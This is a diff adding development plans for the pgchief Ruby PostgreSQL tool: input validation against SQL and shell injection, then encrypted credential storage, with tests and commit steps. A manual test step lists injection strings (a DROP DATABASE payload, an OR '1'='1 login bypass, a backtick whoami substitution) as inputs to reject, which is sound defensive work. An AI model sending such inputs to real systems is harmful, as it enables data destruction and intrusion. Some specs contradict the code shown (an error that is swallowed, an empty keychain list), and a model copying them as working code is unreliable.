+## Task 10: Fix SQL Injection in QuickBackup
+
+**Files:**
+- Modify: `lib/pgchief/command/quick_backup.rb:10`
+
+**Step 1: Add validation to QuickBackup**
+
+Modify `lib/pgchief/command/quick_backup.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require_relative 'database_backup'
+
+module Pgchief
+  module Command
+    class QuickBackup
+      def initialize(database:)
+        @database = Validators.sanitize_identifier(database)  # ADD THIS
+      end
+
+      def backup!
+        Pgchief::Command::DatabaseBackup.new(database: database).backup!
+      end
+
+      private
+
+      attr_reader :database
+    end
+  end
+end
+```
+
+**Step 2: Commit**
+
+```bash
+git add lib/pgchief/command/quick_backup.rb
+git commit -m "fix: add validation to QuickBackup command
+
+- Add identifier validation to QuickBackup#initialize
+- Ensures validation happens even when using quick commands"
+```
+
+---
+
+## Task 11: Fix SQL Injection in QuickRestore
+
+**Files:**
+- Modify: `lib/pgchief/command/quick_restore.rb:10,14`
+
+**Step 1: Add validation to QuickRestore**
+
+Modify `lib/pgchief/command/quick_restore.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require_relative 'database_restore'
+
+module Pgchief
+  module Command
+    class QuickRestore
+      def initialize(database:, location:)
+        @database = Validators.sanitize_identifier(database)
+        @location = Validators.sanitize_file_path(location)
+      end
+
+      def restore!
+        Pgchief::Command::DatabaseRestore.new(
+          database: database,
+          location: location
+        ).restore!
+      end
+
+      private
+
+      attr_reader :database, :location
+    end
+  end
+end
+```
+
+**Step 2: Commit**
+
+```bash
+git add lib/pgchief/command/quick_restore.rb
+git commit -m "fix: add validation to QuickRestore command
+
+- Add identifier and file path validation
+- Ensures validation in quick restore path"
+```
+
+---
+
+## Task 12: Run Full Test Suite
+
+**Step 1: Run all tests**
+
+Run: `bundle exec rspec --format documentation`
+Expected: All tests PASS
+
+**Step 2: Check RuboCop compliance**
+
+Run: `bundle exec rubocop`
+Expected: No offenses (or only acceptable offenses)
+
+**Step 3: Manual security testing**
+
+Try manual injection attempts:
+```bash
+# These should all fail with InvalidIdentifierError
+bundle exec exe/pgchief database create --database "test; DROP DATABASE postgres"
+bundle exec exe/pgchief user create --username "admin' OR '1'='1" --password "test"
+bundle exec exe/pgchief backup --database "test\`whoami\`"
+```
+
+Expected: All commands reject invalid input with clear error messages
+
+**Step 4: Update CHANGELOG**
+
+Add to `CHANGELOG.md`:
+
+```markdown
+## [Unreleased]
+
+### Security
+- **CRITICAL**: Fixed SQL injection vulnerabilities in all database and user commands
+- **CRITICAL**: Fixed shell injection vulnerabilities in backup/restore commands
+- Added comprehensive input validation for database names, usernames, and file paths
+- Replaced string interpolation with parameterized queries where possible
+- Replaced backtick shell execution with Open3 for safe command execution
+- Added security test suite for injection attack scenarios
+
+### Changed
+- DatabaseCreate, DatabaseDrop, UserCreate, UserDrop now validate identifiers
+- DatabasePrivilegesGrant/Revoke refactored with query constants (fixes RuboCop)
+- DatabaseBackup, DatabaseRestore now use Open3 instead of backticks
+- All commands now use Validators module for input sanitization
+```
+
+**Step 5: Final commit**
+
+```bash
+git add CHANGELOG.md
+git commit -m "docs: update CHANGELOG for Week 1 security fixes
+
+Document all SQL and shell injection vulnerability fixes"
+```
+
+---
+
+## Verification Checklist
+
+- [ ] All SQL queries use parameterized queries OR validated identifiers
+- [ ] All shell commands use Open3 instead of backticks
+- [ ] All user inputs are validated before use
+- [ ] Security tests cover SQL injection attempts
+- [ ] Security tests cover shell injection attempts
+- [ ] Security tests cover path traversal attempts
+- [ ] All existing tests still pass
+- [ ] RuboCop passes
+- [ ] Manual testing confirms rejection of malicious input
+- [ ] CHANGELOG updated
+
+## Notes
+
+- PostgreSQL doesn't support parameterized identifiers (database/table/user names), so we validate them strictly and then use string interpolation
+- Passwords use parameterized queries ($1 syntax) for maximum safety
+- File paths are expanded to absolute paths to prevent traversal
+- Open3.capture3 is safer than backticks as it doesn't invoke a shell

--- a/docs/plans/2026-01-30-week2-secure-credential-storage.md
+++ b/docs/plans/2026-01-30-week2-secure-credential-storage.md
@@ -1,0 +1,1520 @@
+# Week 2: Implement Secure Credential Storage Implementation Plan
+
+> **For Claude:** REQUIRED SUB-SKILL: Use superpowers:executing-plans to implement this plan task-by-task.
+
+**Goal:** Replace plain-text credential storage with encrypted credential storage using system keychain where available, with secure file-based fallback.
+
+**Architecture:** Implement a CredentialStore abstraction with multiple backends: system keychain (macOS Keychain, Linux Secret Service, Windows Credential Manager) and encrypted file storage using AES-256-GCM. Use the keyring gem for cross-platform keychain support and the rbnacl gem for encryption.
+
+**Tech Stack:** Ruby 3.0+, keyring gem, rbnacl/libsodium gem, securerandom (stdlib)
+
+---
+
+## Task 1: Add Encryption Dependencies
+
+**Files:**
+- Modify: `pgchief.gemspec`
+- Modify: `Gemfile`
+
+**Step 1: Add gems to gemspec**
+
+Modify `pgchief.gemspec`:
+
+```ruby
+# In the dependencies section, add:
+spec.add_dependency 'keyring', '~> 0.3'  # Cross-platform keychain
+spec.add_dependency 'rbnacl', '~> 7.1'   # Encryption (uses libsodium)
+```
+
+**Step 2: Install dependencies**
+
+Run: `bundle install`
+Expected: Gems install successfully (may require libsodium system package)
+
+**Step 3: Add note to README about libsodium**
+
+Modify `README.md` - add to installation section:
+
+```markdown
+### System Requirements
+
+pgchief requires libsodium for secure credential storage:
+
+**macOS:**
+```bash
+brew install libsodium
+```
+
+**Ubuntu/Debian:**
+```bash
+sudo apt-get install libsodium-dev
+```
+
+**Fedora/RHEL:**
+```bash
+sudo dnf install libsodium-devel
+```
+```
+
+**Step 4: Commit**
+
+```bash
+git add pgchief.gemspec Gemfile Gemfile.lock README.md
+git commit -m "deps: add encryption dependencies for secure credentials
+
+- Add keyring gem for cross-platform keychain access
+- Add rbnacl gem for AES-256-GCM encryption
+- Document libsodium system requirement"
+```
+
+---
+
+## Task 2: Create Encryption Module
+
+**Files:**
+- Create: `lib/pgchief/encryption.rb`
+- Create: `spec/pgchief/encryption_spec.rb`
+
+**Step 1: Write failing tests**
+
+Create `spec/pgchief/encryption_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/encryption'
+
+RSpec.describe Pgchief::Encryption do
+  describe '.encrypt and .decrypt' do
+    it 'encrypts and decrypts data successfully' do
+      plaintext = 'postgresql://user:password@localhost/dbname'
+      key = described_class.generate_key
+
+      encrypted = described_class.encrypt(plaintext, key)
+      expect(encrypted).not_to eq(plaintext)
+      expect(encrypted).to be_a(String)
+
+      decrypted = described_class.decrypt(encrypted, key)
+      expect(decrypted).to eq(plaintext)
+    end
+
+    it 'produces different ciphertext each time (nonce changes)' do
+      plaintext = 'secret data'
+      key = described_class.generate_key
+
+      encrypted1 = described_class.encrypt(plaintext, key)
+      encrypted2 = described_class.encrypt(plaintext, key)
+
+      expect(encrypted1).not_to eq(encrypted2)
+      expect(described_class.decrypt(encrypted1, key)).to eq(plaintext)
+      expect(described_class.decrypt(encrypted2, key)).to eq(plaintext)
+    end
+
+    it 'raises error when decrypting with wrong key' do
+      plaintext = 'secret'
+      key1 = described_class.generate_key
+      key2 = described_class.generate_key
+
+      encrypted = described_class.encrypt(plaintext, key1)
+
+      expect { described_class.decrypt(encrypted, key2) }
+        .to raise_error(RbNaCl::CryptoError)
+    end
+
+    it 'raises error when decrypting tampered data' do
+      plaintext = 'secret'
+      key = described_class.generate_key
+
+      encrypted = described_class.encrypt(plaintext, key)
+      tampered = encrypted.reverse
+
+      expect { described_class.decrypt(tampered, key) }
+        .to raise_error
+    end
+  end
+
+  describe '.generate_key' do
+    it 'generates a random key of correct length' do
+      key = described_class.generate_key
+      expect(key.bytesize).to eq(32) # 256 bits
+    end
+
+    it 'generates different keys each time' do
+      key1 = described_class.generate_key
+      key2 = described_class.generate_key
+      expect(key1).not_to eq(key2)
+    end
+  end
+
+  describe '.key_to_hex and .hex_to_key' do
+    it 'converts key to hex and back' do
+      key = described_class.generate_key
+      hex = described_class.key_to_hex(key)
+
+      expect(hex).to match(/\A[0-9a-f]{64}\z/)
+
+      restored_key = described_class.hex_to_key(hex)
+      expect(restored_key).to eq(key)
+    end
+  end
+end
+```
+
+**Step 2: Run tests to verify they fail**
+
+Run: `bundle exec rspec spec/pgchief/encryption_spec.rb -v`
+Expected: FAIL - file doesn't exist
+
+**Step 3: Implement encryption module**
+
+Create `lib/pgchief/encryption.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'rbnacl'
+require 'base64'
+
+module Pgchief
+  # Encryption utilities using libsodium (via rbnacl)
+  # Uses XSalsa20-Poly1305 authenticated encryption
+  module Encryption
+    KEY_BYTES = RbNaCl::SecretBox.key_bytes # 32 bytes = 256 bits
+
+    # Generate a random encryption key
+    def self.generate_key
+      RbNaCl::Random.random_bytes(KEY_BYTES)
+    end
+
+    # Encrypt plaintext with key, returns Base64-encoded ciphertext
+    def self.encrypt(plaintext, key)
+      box = RbNaCl::SecretBox.new(key)
+      nonce = RbNaCl::Random.random_bytes(box.nonce_bytes)
+
+      ciphertext = box.encrypt(nonce, plaintext)
+
+      # Prepend nonce to ciphertext, encode as Base64
+      Base64.strict_encode64(nonce + ciphertext)
+    end
+
+    # Decrypt Base64-encoded ciphertext with key
+    def self.decrypt(encrypted_base64, key)
+      box = RbNaCl::SecretBox.new(key)
+
+      # Decode from Base64
+      data = Base64.strict_decode64(encrypted_base64)
+
+      # Extract nonce and ciphertext
+      nonce = data[0...box.nonce_bytes]
+      ciphertext = data[box.nonce_bytes..]
+
+      box.decrypt(nonce, ciphertext)
+    end
+
+    # Convert binary key to hex string for storage
+    def self.key_to_hex(key)
+      key.unpack1('H*')
+    end
+
+    # Convert hex string to binary key
+    def self.hex_to_key(hex)
+      [hex].pack('H*')
+    end
+  end
+end
+```
+
+**Step 4: Run tests to verify they pass**
+
+Run: `bundle exec rspec spec/pgchief/encryption_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Require encryption module**
+
+Modify `lib/pgchief.rb`:
+
+```ruby
+# Add with other requires
+require_relative 'pgchief/encryption'
+```
+
+**Step 6: Commit**
+
+```bash
+git add lib/pgchief/encryption.rb spec/pgchief/encryption_spec.rb lib/pgchief.rb
+git commit -m "feat: add encryption module using libsodium
+
+- Implement encrypt/decrypt using XSalsa20-Poly1305
+- Add authenticated encryption (prevents tampering)
+- Add key generation and hex encoding utilities
+- Add comprehensive tests including tampering detection"
+```
+
+---
+
+## Task 3: Create CredentialStore Abstraction
+
+**Files:**
+- Create: `lib/pgchief/credential_store.rb`
+- Create: `spec/pgchief/credential_store_spec.rb`
+
+**Step 1: Write failing tests**
+
+Create `spec/pgchief/credential_store_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/credential_store'
+
+RSpec.describe Pgchief::CredentialStore do
+  let(:store) { described_class.new }
+  let(:test_key) { 'test_connection' }
+  let(:test_value) { 'postgresql://user:password@localhost/testdb' }
+
+  describe '#store' do
+    it 'stores a credential' do
+      expect { store.store(test_key, test_value) }.not_to raise_error
+    end
+
+    it 'validates key format' do
+      expect { store.store('bad key!', test_value) }
+        .to raise_error(Pgchief::InvalidIdentifierError)
+    end
+  end
+
+  describe '#retrieve' do
+    it 'retrieves a stored credential' do
+      store.store(test_key, test_value)
+      expect(store.retrieve(test_key)).to eq(test_value)
+    end
+
+    it 'returns nil for non-existent credentials' do
+      expect(store.retrieve('nonexistent')).to be_nil
+    end
+
+    it 'validates key format' do
+      expect { store.retrieve('bad key!') }
+        .to raise_error(Pgchief::InvalidIdentifierError)
+    end
+  end
+
+  describe '#delete' do
+    it 'deletes a stored credential' do
+      store.store(test_key, test_value)
+      store.delete(test_key)
+      expect(store.retrieve(test_key)).to be_nil
+    end
+
+    it 'handles deletion of non-existent credentials' do
+      expect { store.delete('nonexistent') }.not_to raise_error
+    end
+  end
+
+  describe '#list' do
+    it 'lists all stored credential keys' do
+      store.store('connection1', 'value1')
+      store.store('connection2', 'value2')
+
+      list = store.list
+      expect(list).to include('connection1', 'connection2')
+    end
+
+    it 'returns empty array when no credentials stored' do
+      expect(store.list).to eq([])
+    end
+  end
+end
+```
+
+**Step 2: Run tests to verify they fail**
+
+Run: `bundle exec rspec spec/pgchief/credential_store_spec.rb -v`
+Expected: FAIL
+
+**Step 3: Implement CredentialStore with backend selection**
+
+Create `lib/pgchief/credential_store.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'keyring'
+require_relative 'credential_store/keychain_backend'
+require_relative 'credential_store/encrypted_file_backend'
+
+module Pgchief
+  # Credential storage abstraction
+  # Tries to use system keychain, falls back to encrypted file
+  class CredentialStore
+    SERVICE_NAME = 'pgchief'
+
+    def initialize(backend: nil)
+      @backend = backend || select_backend
+    end
+
+    def store(key, value)
+      validate_key!(key)
+      backend.store(key, value)
+    end
+
+    def retrieve(key)
+      validate_key!(key)
+      backend.retrieve(key)
+    end
+
+    def delete(key)
+      validate_key!(key)
+      backend.delete(key)
+    end
+
+    def list
+      backend.list
+    end
+
+    private
+
+    attr_reader :backend
+
+    def select_backend
+      # Try keychain first, fall back to encrypted file
+      if keychain_available?
+        KeychainBackend.new
+      else
+        EncryptedFileBackend.new
+      end
+    end
+
+    def keychain_available?
+      # Test if we can access the keychain
+      Keyring.new(SERVICE_NAME, 'test').get_password
+      true
+    rescue Keyring::Errors::BackendNotFound, Keyring::Errors::InitializationError
+      false
+    end
+
+    def validate_key!(key)
+      Validators.sanitize_identifier(key)
+    end
+  end
+end
+```
+
+**Step 4: This will fail because we haven't created the backends yet**
+
+Expected: Will fail to load due to missing backend files
+
+---
+
+## Task 4: Implement Keychain Backend
+
+**Files:**
+- Create: `lib/pgchief/credential_store/keychain_backend.rb`
+
+**Step 1: Implement keychain backend**
+
+Create `lib/pgchief/credential_store/keychain_backend.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'keyring'
+
+module Pgchief
+  class CredentialStore
+    # Backend that uses system keychain (macOS Keychain, GNOME Keyring, etc.)
+    class KeychainBackend
+      SERVICE_NAME = 'pgchief'
+
+      def store(key, value)
+        keyring(key).set_password(value)
+      end
+
+      def retrieve(key)
+        keyring(key).get_password
+      rescue Keyring::Errors::EmptyUsername, Keyring::Errors::PasswordNotFound
+        nil
+      end
+
+      def delete(key)
+        keyring(key).delete_password
+      rescue Keyring::Errors::PasswordNotFound
+        # Already deleted, no-op
+      end
+
+      def list
+        # Keyring gem doesn't support listing, so we can't implement this
+        # without storing a manifest elsewhere. For now, return empty array.
+        # Users need to remember their credential names.
+        []
+      end
+
+      private
+
+      def keyring(username)
+        Keyring.new(SERVICE_NAME, username)
+      end
+    end
+  end
+end
+```
+
+**Step 2: Commit**
+
+```bash
+git add lib/pgchief/credential_store/keychain_backend.rb
+git commit -m "feat: add keychain backend for credential storage
+
+- Use system keychain when available (macOS, Linux, Windows)
+- Implement store/retrieve/delete operations
+- Graceful handling of missing credentials"
+```
+
+---
+
+## Task 5: Implement Encrypted File Backend
+
+**Files:**
+- Create: `lib/pgchief/credential_store/encrypted_file_backend.rb`
+- Create: `spec/pgchief/credential_store/encrypted_file_backend_spec.rb`
+
+**Step 1: Write failing tests**
+
+Create `spec/pgchief/credential_store/encrypted_file_backend_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/credential_store/encrypted_file_backend'
+require 'fileutils'
+require 'tmpdir'
+
+RSpec.describe Pgchief::CredentialStore::EncryptedFileBackend do
+  let(:temp_dir) { Dir.mktmpdir }
+  let(:backend) { described_class.new(storage_dir: temp_dir) }
+
+  after do
+    FileUtils.rm_rf(temp_dir)
+  end
+
+  describe '#store and #retrieve' do
+    it 'stores and retrieves encrypted credentials' do
+      backend.store('test_key', 'secret_value')
+      expect(backend.retrieve('test_key')).to eq('secret_value')
+    end
+
+    it 'encrypts credentials in the file' do
+      backend.store('test_key', 'secret_value')
+
+      # Read the raw file
+      credentials_file = File.join(temp_dir, 'credentials.enc')
+      raw_content = File.read(credentials_file)
+
+      # Should not contain plaintext
+      expect(raw_content).not_to include('secret_value')
+      expect(raw_content).not_to include('test_key')
+    end
+
+    it 'returns nil for non-existent credentials' do
+      expect(backend.retrieve('nonexistent')).to be_nil
+    end
+  end
+
+  describe '#delete' do
+    it 'deletes a stored credential' do
+      backend.store('test_key', 'value')
+      backend.delete('test_key')
+      expect(backend.retrieve('test_key')).to be_nil
+    end
+  end
+
+  describe '#list' do
+    it 'lists all stored credential keys' do
+      backend.store('key1', 'value1')
+      backend.store('key2', 'value2')
+
+      expect(backend.list).to contain_exactly('key1', 'key2')
+    end
+
+    it 'returns empty array when no credentials' do
+      expect(backend.list).to eq([])
+    end
+  end
+
+  describe 'file permissions' do
+    it 'creates credentials file with secure permissions (0600)' do
+      backend.store('test', 'value')
+
+      credentials_file = File.join(temp_dir, 'credentials.enc')
+      stat = File.stat(credentials_file)
+      mode = stat.mode & 0o777
+
+      expect(mode).to eq(0o600)
+    end
+
+    it 'creates key file with secure permissions (0600)' do
+      backend.store('test', 'value')
+
+      key_file = File.join(temp_dir, '.credentials.key')
+      stat = File.stat(key_file)
+      mode = stat.mode & 0o777
+
+      expect(mode).to eq(0o600)
+    end
+  end
+
+  describe 'encryption key management' do
+    it 'persists encryption key across instances' do
+      backend1 = described_class.new(storage_dir: temp_dir)
+      backend1.store('test', 'value')
+
+      backend2 = described_class.new(storage_dir: temp_dir)
+      expect(backend2.retrieve('test')).to eq('value')
+    end
+
+    it 'generates new key if key file is missing' do
+      backend.store('test', 'value')
+
+      # Delete key file
+      key_file = File.join(temp_dir, '.credentials.key')
+      File.delete(key_file)
+
+      # New backend can't decrypt old credentials
+      backend2 = described_class.new(storage_dir: temp_dir)
+      expect { backend2.retrieve('test') }.to raise_error(RbNaCl::CryptoError)
+    end
+  end
+end
+```
+
+**Step 2: Run tests to verify they fail**
+
+Run: `bundle exec rspec spec/pgchief/credential_store/encrypted_file_backend_spec.rb -v`
+Expected: FAIL
+
+**Step 3: Implement encrypted file backend**
+
+Create `lib/pgchief/credential_store/encrypted_file_backend.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'json'
+require 'fileutils'
+require_relative '../encryption'
+
+module Pgchief
+  class CredentialStore
+    # Backend that stores credentials in an encrypted JSON file
+    class EncryptedFileBackend
+      DEFAULT_STORAGE_DIR = File.join(Dir.home, '.pgchief')
+      CREDENTIALS_FILE = 'credentials.enc'
+      KEY_FILE = '.credentials.key'
+
+      def initialize(storage_dir: DEFAULT_STORAGE_DIR)
+        @storage_dir = storage_dir
+        @credentials_path = File.join(storage_dir, CREDENTIALS_FILE)
+        @key_path = File.join(storage_dir, KEY_FILE)
+
+        ensure_storage_dir!
+        ensure_key!
+      end
+
+      def store(key, value)
+        credentials = load_credentials
+        credentials[key] = value
+        save_credentials(credentials)
+      end
+
+      def retrieve(key)
+        credentials = load_credentials
+        credentials[key]
+      end
+
+      def delete(key)
+        credentials = load_credentials
+        credentials.delete(key)
+        save_credentials(credentials)
+      end
+
+      def list
+        load_credentials.keys
+      end
+
+      private
+
+      attr_reader :storage_dir, :credentials_path, :key_path
+
+      def ensure_storage_dir!
+        FileUtils.mkdir_p(storage_dir) unless Dir.exist?(storage_dir)
+      end
+
+      def ensure_key!
+        return if File.exist?(key_path)
+
+        # Generate new encryption key
+        key = Encryption.generate_key
+        key_hex = Encryption.key_to_hex(key)
+
+        File.write(key_path, key_hex)
+        File.chmod(0o600, key_path)
+      end
+
+      def load_key
+        key_hex = File.read(key_path)
+        Encryption.hex_to_key(key_hex.strip)
+      end
+
+      def load_credentials
+        return {} unless File.exist?(credentials_path)
+
+        encrypted_data = File.read(credentials_path)
+        return {} if encrypted_data.empty?
+
+        json_data = Encryption.decrypt(encrypted_data, load_key)
+        JSON.parse(json_data)
+      rescue JSON::ParserError, RbNaCl::CryptoError
+        # Corrupted file, start fresh
+        {}
+      end
+
+      def save_credentials(credentials)
+        json_data = JSON.generate(credentials)
+        encrypted_data = Encryption.encrypt(json_data, load_key)
+
+        File.write(credentials_path, encrypted_data)
+        File.chmod(0o600, credentials_path)
+      end
+    end
+  end
+end
+```
+
+**Step 4: Run tests to verify they pass**
+
+Run: `bundle exec rspec spec/pgchief/credential_store/encrypted_file_backend_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Run credential store tests**
+
+Run: `bundle exec rspec spec/pgchief/credential_store_spec.rb -v`
+Expected: All tests PASS
+
+**Step 6: Commit**
+
+```bash
+git add lib/pgchief/credential_store/encrypted_file_backend.rb spec/pgchief/credential_store/encrypted_file_backend_spec.rb
+git commit -m "feat: add encrypted file backend for credential storage
+
+- Store credentials in encrypted JSON file
+- Generate and persist encryption key securely
+- Set file permissions to 0600 for security
+- Handle corrupted files gracefully
+- Add comprehensive tests including permission checks"
+```
+
+---
+
+## Task 6: Update StoreConnectionString to Use CredentialStore
+
+**Files:**
+- Modify: `lib/pgchief/command/store_connection_string.rb`
+- Modify: `spec/pgchief/command/store_connection_string_spec.rb`
+
+**Step 1: Read current implementation**
+
+Run: `cat lib/pgchief/command/store_connection_string.rb`
+
+**Step 2: Update tests to expect secure storage**
+
+Modify `spec/pgchief/command/store_connection_string_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/store_connection_string'
+require 'pgchief/credential_store'
+require 'tmpdir'
+
+RSpec.describe Pgchief::Command::StoreConnectionString do
+  let(:temp_dir) { Dir.mktmpdir }
+  let(:credential_store) do
+    Pgchief::CredentialStore.new(
+      backend: Pgchief::CredentialStore::EncryptedFileBackend.new(storage_dir: temp_dir)
+    )
+  end
+
+  after do
+    FileUtils.rm_rf(temp_dir)
+  end
+
+  describe '#store!' do
+    it 'stores connection string securely' do
+      command = described_class.new(
+        name: 'production',
+        connection_string: 'postgresql://user:password@localhost/proddb',
+        credential_store: credential_store
+      )
+
+      expect { command.store! }.to output(/Stored connection: production/).to_stdout
+    end
+
+    it 'validates connection string name' do
+      expect do
+        described_class.new(
+          name: 'bad name!',
+          connection_string: 'postgresql://localhost/db',
+          credential_store: credential_store
+        )
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'validates connection string format' do
+      expect do
+        described_class.new(
+          name: 'test',
+          connection_string: 'not-a-valid-url',
+          credential_store: credential_store
+        ).store!
+      end.to raise_error(/Invalid connection string/)
+    end
+
+    it 'encrypts the stored credential' do
+      command = described_class.new(
+        name: 'test',
+        connection_string: 'postgresql://user:secretpass@localhost/db',
+        credential_store: credential_store
+      )
+      command.store!
+
+      # Check that the password is not stored in plaintext
+      credentials_file = File.join(temp_dir, 'credentials.enc')
+      raw_content = File.read(credentials_file)
+
+      expect(raw_content).not_to include('secretpass')
+      expect(raw_content).not_to include('postgresql')
+    end
+  end
+end
+```
+
+**Step 3: Run tests to verify they fail**
+
+Run: `bundle exec rspec spec/pgchief/command/store_connection_string_spec.rb -v`
+Expected: FAIL - implementation uses old file-based storage
+
+**Step 4: Rewrite StoreConnectionString to use CredentialStore**
+
+Modify `lib/pgchief/command/store_connection_string.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'uri'
+require_relative '../credential_store'
+
+module Pgchief
+  module Command
+    class StoreConnectionString
+      def initialize(name:, connection_string:, credential_store: nil)
+        @name = Validators.sanitize_identifier(name)
+        @connection_string = validate_connection_string!(connection_string)
+        @credential_store = credential_store || CredentialStore.new
+      end
+
+      def store!
+        credential_store.store(name, connection_string)
+        puts "Stored connection: #{name}"
+      rescue StandardError => e
+        puts "Error storing connection: #{e.message}"
+      end
+
+      private
+
+      attr_reader :name, :connection_string, :credential_store
+
+      def validate_connection_string!(str)
+        uri = URI.parse(str)
+
+        # Must be a PostgreSQL URL
+        unless uri.scheme&.match?(/\Apostgres(ql)?\z/)
+          raise ArgumentError, 'Invalid connection string: must start with postgresql:// or postgres://'
+        end
+
+        str
+      rescue URI::InvalidURIError => e
+        raise ArgumentError, "Invalid connection string: #{e.message}"
+      end
+    end
+  end
+end
+```
+
+**Step 5: Run tests to verify they pass**
+
+Run: `bundle exec rspec spec/pgchief/command/store_connection_string_spec.rb -v`
+Expected: All tests PASS
+
+**Step 6: Commit**
+
+```bash
+git add lib/pgchief/command/store_connection_string.rb spec/pgchief/command/store_connection_string_spec.rb
+git commit -m "refactor: use CredentialStore for storing connections
+
+- Replace file-based storage with CredentialStore
+- Add connection string format validation
+- Add name validation
+- Credentials now encrypted or in system keychain
+- Update tests to verify encryption"
+```
+
+---
+
+## Task 7: Update RetrieveConnectionString to Use CredentialStore
+
+**Files:**
+- Modify: `lib/pgchief/command/retrieve_connection_string.rb`
+- Modify: `spec/pgchief/command/retrieve_connection_string_spec.rb`
+
+**Step 1: Update tests**
+
+Modify `spec/pgchief/command/retrieve_connection_string_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/retrieve_connection_string'
+require 'pgchief/credential_store'
+require 'tmpdir'
+
+RSpec.describe Pgchief::Command::RetrieveConnectionString do
+  let(:temp_dir) { Dir.mktmpdir }
+  let(:credential_store) do
+    Pgchief::CredentialStore.new(
+      backend: Pgchief::CredentialStore::EncryptedFileBackend.new(storage_dir: temp_dir)
+    )
+  end
+
+  after do
+    FileUtils.rm_rf(temp_dir)
+  end
+
+  describe '#retrieve!' do
+    it 'retrieves a stored connection string' do
+      credential_store.store('production', 'postgresql://user:pass@localhost/proddb')
+
+      command = described_class.new(name: 'production', credential_store: credential_store)
+      expect { command.retrieve! }
+        .to output("postgresql://user:pass@localhost/proddb\n").to_stdout
+    end
+
+    it 'handles non-existent connection names' do
+      command = described_class.new(name: 'nonexistent', credential_store: credential_store)
+      expect { command.retrieve! }
+        .to output(/Connection not found: nonexistent/).to_stdout
+    end
+
+    it 'validates connection name' do
+      expect do
+        described_class.new(name: 'bad name!', credential_store: credential_store)
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+  end
+end
+```
+
+**Step 2: Run tests to verify they fail**
+
+Run: `bundle exec rspec spec/pgchief/command/retrieve_connection_string_spec.rb -v`
+Expected: FAIL
+
+**Step 3: Rewrite RetrieveConnectionString**
+
+Modify `lib/pgchief/command/retrieve_connection_string.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require_relative '../credential_store'
+
+module Pgchief
+  module Command
+    class RetrieveConnectionString
+      def initialize(name:, credential_store: nil)
+        @name = Validators.sanitize_identifier(name)
+        @credential_store = credential_store || CredentialStore.new
+      end
+
+      def retrieve!
+        connection_string = credential_store.retrieve(name)
+
+        if connection_string
+          puts connection_string
+        else
+          puts "Connection not found: #{name}"
+        end
+      rescue StandardError => e
+        puts "Error retrieving connection: #{e.message}"
+      end
+
+      private
+
+      attr_reader :name, :credential_store
+    end
+  end
+end
+```
+
+**Step 4: Run tests to verify they pass**
+
+Run: `bundle exec rspec spec/pgchief/command/retrieve_connection_string_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Commit**
+
+```bash
+git add lib/pgchief/command/retrieve_connection_string.rb spec/pgchief/command/retrieve_connection_string_spec.rb
+git commit -m "refactor: use CredentialStore for retrieving connections
+
+- Replace file parsing with CredentialStore
+- Simplify implementation
+- Add name validation
+- Update tests"
+```
+
+---
+
+## Task 8: Add Credential List Command
+
+**Files:**
+- Create: `lib/pgchief/command/list_connections.rb`
+- Create: `spec/pgchief/command/list_connections_spec.rb`
+
+**Step 1: Write failing tests**
+
+Create `spec/pgchief/command/list_connections_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/list_connections'
+require 'pgchief/credential_store'
+require 'tmpdir'
+
+RSpec.describe Pgchief::Command::ListConnections do
+  let(:temp_dir) { Dir.mktmpdir }
+  let(:credential_store) do
+    Pgchief::CredentialStore.new(
+      backend: Pgchief::CredentialStore::EncryptedFileBackend.new(storage_dir: temp_dir)
+    )
+  end
+
+  after do
+    FileUtils.rm_rf(temp_dir)
+  end
+
+  describe '#list!' do
+    it 'lists all stored connections' do
+      credential_store.store('production', 'postgresql://prod')
+      credential_store.store('staging', 'postgresql://staging')
+
+      command = described_class.new(credential_store: credential_store)
+      expect { command.list! }
+        .to output(/Stored connections:\n- production\n- staging/).to_stdout
+    end
+
+    it 'shows message when no connections stored' do
+      command = described_class.new(credential_store: credential_store)
+      expect { command.list! }
+        .to output(/No stored connections/).to_stdout
+    end
+  end
+end
+```
+
+**Step 2: Run tests to verify they fail**
+
+Run: `bundle exec rspec spec/pgchief/command/list_connections_spec.rb -v`
+Expected: FAIL
+
+**Step 3: Implement ListConnections**
+
+Create `lib/pgchief/command/list_connections.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require_relative '../credential_store'
+
+module Pgchief
+  module Command
+    class ListConnections
+      def initialize(credential_store: nil)
+        @credential_store = credential_store || CredentialStore.new
+      end
+
+      def list!
+        connections = credential_store.list
+
+        if connections.empty?
+          puts 'No stored connections'
+        else
+          puts 'Stored connections:'
+          connections.sort.each do |name|
+            puts "- #{name}"
+          end
+        end
+      rescue StandardError => e
+        puts "Error listing connections: #{e.message}"
+      end
+
+      private
+
+      attr_reader :credential_store
+    end
+  end
+end
+```
+
+**Step 4: Run tests to verify they pass**
+
+Run: `bundle exec rspec spec/pgchief/command/list_connections_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Require the new command**
+
+Modify `lib/pgchief.rb`:
+
+```ruby
+# Add with other command requires
+require_relative 'pgchief/command/list_connections'
+```
+
+**Step 6: Commit**
+
+```bash
+git add lib/pgchief/command/list_connections.rb spec/pgchief/command/list_connections_spec.rb lib/pgchief.rb
+git commit -m "feat: add command to list stored connections
+
+- Implement ListConnections command
+- Show all stored connection names
+- Handle empty case gracefully"
+```
+
+---
+
+## Task 9: Add CLI Support for New Commands
+
